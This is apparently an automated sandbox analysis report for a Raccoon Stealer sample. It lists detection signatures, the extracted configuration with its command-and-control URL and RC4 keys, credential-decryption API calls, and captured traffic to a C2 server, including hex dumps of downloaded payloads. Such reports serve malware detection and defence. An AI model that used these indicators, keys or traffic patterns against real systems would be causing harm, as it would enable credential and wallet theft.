Play interactive tour

Edit tour

Windows Analysis Report KnZsSmDyF3.exe

Overview

General Information

Sample Name:	KnZsSmDyF3.exe
Analysis ID:	452449
MD5:	aa717550158faf72a3776ce7115f80d3
SHA1:	6d0bbf0b16b7f9e5948c18f488b5428b329821f3
SHA256:	b61998322190573353437177fd9a48263cae5d867055800d86b5fcf006253fdc
Tags:	exeRaccoonStealer
Infos:
Most interesting Screenshot:

Detection

Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Raccoon Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to steal Internet Explorer form passwords

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

PE file does not import any functions

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

KnZsSmDyF3.exe (PID: 4712 cmdline: 'C:\Users\user\Desktop\KnZsSmDyF3.exe' MD5: AA717550158FAF72A3776CE7115F80D3)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: KnZsSmDyF3.exe PID: 4712	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: KnZsSmDyF3.exe PID: 4712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.KnZsSmDyF3.exe.400000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.KnZsSmDyF3.exe.400000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.2.KnZsSmDyF3.exe.2670e50.4.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
1.3.KnZsSmDyF3.exe.2770000.0.unpack	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack

Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://telete.in/jagressor_kz", "Bot ID": "cd8dc1031358b1aec55cc6bc447df1018b068607", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Multi AV Scanner detection for domain / URL

Show sources

Source: telete.in	Virustotal: Detection: 12%			Perma Link
Source: https://telete.in/jagressor_kz	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: KnZsSmDyF3.exe	Virustotal: Detection: 62%	Perma Link
Source: KnZsSmDyF3.exe	Metadefender: Detection: 28%	Perma Link
Source: KnZsSmDyF3.exe	ReversingLabs: Detection: 75%

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY

Machine Learning detection for sample

Show sources

Source: KnZsSmDyF3.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040CD04 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,	1_2_0040CD04
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040EE22 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree,	1_2_0040EE22
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040D407 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,	1_2_0040D407
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_004274BC CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,	1_2_004274BC
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0042768F lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,	1_2_0042768F
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040DE52 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,	1_2_0040DE52
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0040C12D __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey,	1_2_0040C12D
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	Code function: 1_2_0041E61E __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot,	1_2_0041E61E

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Unpacked PE file: 1.2.KnZsSmDyF3.exe.400000.0.unpack

Source: KnZsSmDyF3.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2

Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source:	Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source:	Binary string: C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_0043BDC7 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,

1_2_0043BDC7

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe

Code function: 1_2_004329F2 __EH_prolog,GetLogicalDriveStringsA,

1_2_004329F2

Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\KnZsSmDyF3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://telete.in/jagressor_kz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:00 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:06 GMTETag: "60e9b7d6-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197
Source: global traffic	HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: global traffic	HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1392Host: 94.228.114.197

Source: Joe Sandbox View

IP Address: 195.201.225.248 195.201.225.248

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197
Source: unknown	TCP traffic detected without corresponding DNS query: 94.228.114.197

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 09:28:04 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sat, 10 Jul 2021 15:08:05 GMTETag: "60e9b7d5-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: global traffic	HTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
